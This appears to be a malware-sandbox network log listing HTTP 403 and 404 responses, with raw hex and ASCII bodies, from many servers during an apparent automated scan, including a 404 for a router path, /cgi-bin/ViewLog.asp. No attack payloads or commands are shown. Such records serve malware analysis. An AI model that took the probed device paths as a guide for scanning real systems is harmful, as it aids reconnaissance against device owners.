Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Mar 2024 08:59:25 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 33 0d 0a Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>3403
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 15:59:25 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 15:59:25 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 18 Mar 2024 08:59:26 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:27 GMTServer: Apache/2.2.15 (Red Hat)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 189Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e c1 0e 82 30 10 44 ef 7c c5 ca 1d 16 0d c7 a6 07 05 22 09 22 31 d5 c4 23 d8 15 9a 20 45 5a 24 fe bd a0 17 8f b3 33 6f 66 d9 2a 3a ee c4 b5 88 61 2f 0e 19 14 e7 6d 96 ee c0 f5 10 d3 58 24 88 91 88 7e ce c6 0f 10 e3 dc e5 0e 6b ec a3 e5 ac a1 52 ce c2 2a db 12 0f 83 10 72 6d 21 d1 63 27 19 fe 8e 0e c3 6f 88 55 5a be 17 6e cd ff 32 b3 72 58 cf 45 43 30 d0 73 24 63 49 c2 f9 94 01 de 6a e5 55 aa c3 8b a2 29 d3 b5 5f 9a 1e a6 d2 40 37 c3 f7 05 06 dd 81 6d 94 01 43 c3 8b 06 9f 61 bf 8c 7d 67 e6 e2 e5 3d e7 03 7b f7 ab 8c d9 00 00 00 Data Ascii: M0D\|""1# EZ$3of:a/mX$~kRrm!c'oUZn2rXEC0s$cIjU)_@7mCa}g={
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 15:59:25 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 03:32:09 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:59:32 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:59:32 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 18 Mar 2024 08:59:34 GMTServer: ApacheContent-Length: 59Keep-Alive: timeout=3, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Forbidden</h1>You don't have permission on this server.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-EncodingX-Frame-Options: SAMEORIGINContent-Type: text/htmlX-Content-Type-Options: nosniffDate: Mon, 18 Mar 2024 03:59:33 GMTCache-Control: no-cacheContent-Length: 223X-XSS-Protection: 1; mode=blockConnection: Keep-AliveAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:59:32 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 18 Mar 2024 08:59:37 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:59:38 GMTServer: Apache/2.2.16 (Debian)Content-Length: 292Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache/2.2.16 (Debian) Server at 127.0.0.1 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/htmllast-modified: Tue, 25 Jun 2019 07:01:36 GMTetag: "999-5d11c6d0-22a3701833ded0e1;gz"accept-ranges: bytescontent-encoding: gzipvary: Accept-Encodingcontent-length: 1159date: Mon, 18 Mar 2024 08:59:38 GMTserver: LiteSpeedplatform: hostingerData Raw: 1f 8b 08 00 00 00 00 00 00 03 85 56 6d 8f db 36 0c fe 9e 5f a1 ba 1f 92 6c b6 e5 dc f5 35 b1 b3 f5 75 18 b0 f5 06 f4 0a 74 b8 1d 06 46 62 6c f6 64 c9 95 94 4b b2 5e ff fb 20 3b 6f f7 92 cd 80 62 8b 7c 48 51 0f 45 2a f9 a3 b7 67 6f ce ff fc e3 1d ab 7c ad a6 bd 3c bc 98 02 5d 16 11 ea 64 e1 22 d6 58 9c d3 aa 88 84 d1 1e b5 1f b3 ca fb 66 cc 79 b3 b0 2a 35 b6 e4 d6 39 3e 4a 33 5e 1b b9 50 e8 f8 06 c8 99 14 f7 c1 52 70 8f b6 76 9c cd 0d cc 77 fa 55 ad b4 4b 85 a9 79 10 f3 2c 1d 71 66 ca 9d da 94 4d 5a 23 d7 ee 31 b3 72 ee 76 f2 e5 72 99 2e 4f 5b c7 27 59 96 f1 6c c4 ad 9c 27 4e 54 58 c3 63 e6 c8 ec 43 08 86 2d 32 48 5b 57 e1 c3 1f d1 fb 75 83 01 72 65 8e ad f6 84 67 27 3c e8 b9 30 16 1f b3 95 93 47 90 23 fe f9 f7 df 3e 76 31 45 d3 5e 2f af 10 e4 b4 c7 18 63 79 8d 1e 5a ab 04 bf 2e e8 ba 88 de 74 ec 25 e7 eb 06 23 b6 e1 b2 88 3c ae 3c 0f c9 99 30 51 81 75 e8 8b 4f e7 ef 93 17 d1 c6 8f f3 6b 85 2c 44 bd c1 0a e7 36 ba f0 fc bc 31 62 51 67 35 d9 69 2e 74 f9 d7 58 28 03 57 97 f1 a1 30 b9 27 93 e0 21 79 48 b1 7a 48 9a 6e 65 07 a2 3d f0 36 ae 22 89 63 6d fc 60 3b 49 40 53 0d 1e 87 ec db 0e 18 1e 49 ae 51 b0 1e 33 6d 34 b2 47 54 37 c6 7a d0 7e bf 9d ef bd dd 67 d8 d8 dc d8 fa 98 8f 99 32 e2 ea 41 cb 10 c6 26 82 c4 55 74 d7 c3 35 39 9a 91 22 bf 1e b3 8a a4 44 fd 1f 5e 44 65 ec 1d fb c6 38 f2 64 f4 98 c1 cc 19 b5 f0 78 68 df a6 93 b7 f9 3c 76 46 3e 27 9f 5e 25 6f 4c dd 80 a7 99 3a 3c 26 bf be 2b 50 96 18 1d 5a 6a a8 b1 88 ae 09 97 81 ad 03 f0 92 a4 af 0a 89 d7 24 30 69 27 31 23 4d 9e 40 25 4e 80 c2 62 b4 75 e4 c9 2b 9c 9e 99 c6 c5 cc 99 1a 7d 45 ba 64 ca 38 9f f3 4e 77 6f 41 89 4e 58 6a c2 46 0f d6 ec 5c 28 63 ae 1c 53 74 85 cc 57 c8 1a 28 91 91 6b fd a5 ec a3 07 eb d9 da 2c 2c 5b e2 cc 91 47 66 74 8b 13 15 42 93 6e 63 52 a4 af 58 8d 92 a0 88 40 a9 88 59 54 45 d4 12 e7 2a 44 1f b1 ca e2 bc 88 78 e5 a5 11 ee 6f b4 d6 d8 8e d8 74 5f 1d 9d 9b 23 a6 81 74 37 e6 bc 86 95 90 3a 9d 19 e3 9d b7 d0 84 49 68 56 3b 01 3f 4d 4f d3 e7 a1 e8 f6 b2 b4 26 7d 6f a1 db 7e e7 46 7b 97 96 c6 94 0a a1 a1 ae 03 0a e7 7e 9a 43 4d 6a 5d 9c 35 a8 7f fc 08 da 8d 4f b3 2c 3e cd 32 8a 9f 64 59 18 14 3f cb b2 30 28 7e 9e 65 61 50 fc 22 cb c2 a0 fb 4c 4c 7b 9b 2e d1 66 64 df 16 06 f3 85 16 21 43 03 8a 5d 6c e2 32 b6 31 c4 f5 f0 1b 5d f4 7f 69 a3 7a a5 41 ad 3d 09 77 36 fb 82 c2 f7 2f 0b 3b a1 0b 7b 59 84 9f 9b 9b 9d fd f0 f6 11 6f 9d 07 48 fa b5 e8 5e 37 37 17 97 c3 b4 59 b8 6a 00 b6 5c d4 a8 bd 1b 7e 8f 5b a5 2a 46 3f 68 5c b2 b7 e0 71 30 9c 40 e1 52 61 11 3c be 53 18 80 03 33 8c 6f b9 af 0b 97 96 e8 37 6a f7 7a 7d 0e e5 07 a8 71 60 86 17 d9 e5 04 52 70 6b 2d 8a d1 04 52 67 45 51 4e ea b4 01 8b da 7f 30 12 53 d2 0e ad 7f 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Mon, 18 Mar 2024 03:59:38 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:59:40 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 18 Mar 2024 08:59:42 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 18 Mar 2024 08:59:42 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.10.3</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 18 Mar 2024 08:59:42 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveTiming-Allow-Origin: Cache-Control: no-storePragma: no-cacheAccess-Control-Allow-Origin: Access-Control-Expose-Headers: X-TCP-InfoX-TCP-Info: addr=191.96.227.194;port=55324;sc=Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: HASP LM/28.02Date: Mon, 18 Mar 2024 08:56:55 GMTX-Robots-Tag: noindex, nofollowX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=0;X-Content-Type-Options: nosniffReferrer-Policy: strict-originContent-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'X-XSS-Protection: 1; mode=blockContent-Type: text/htmlContent-Length: 137Connection: CloseData Raw: 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 68 61 73 20 62 65 65 6e 20 64 65 6e 69 65 64 20 74 6f 20 79 6f 75 2e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 0a Data Ascii: <title>403 Forbidden</title><h1>403 Forbidden</h1>Access to this resource has been denied to you.<p>Please contact the administrator.
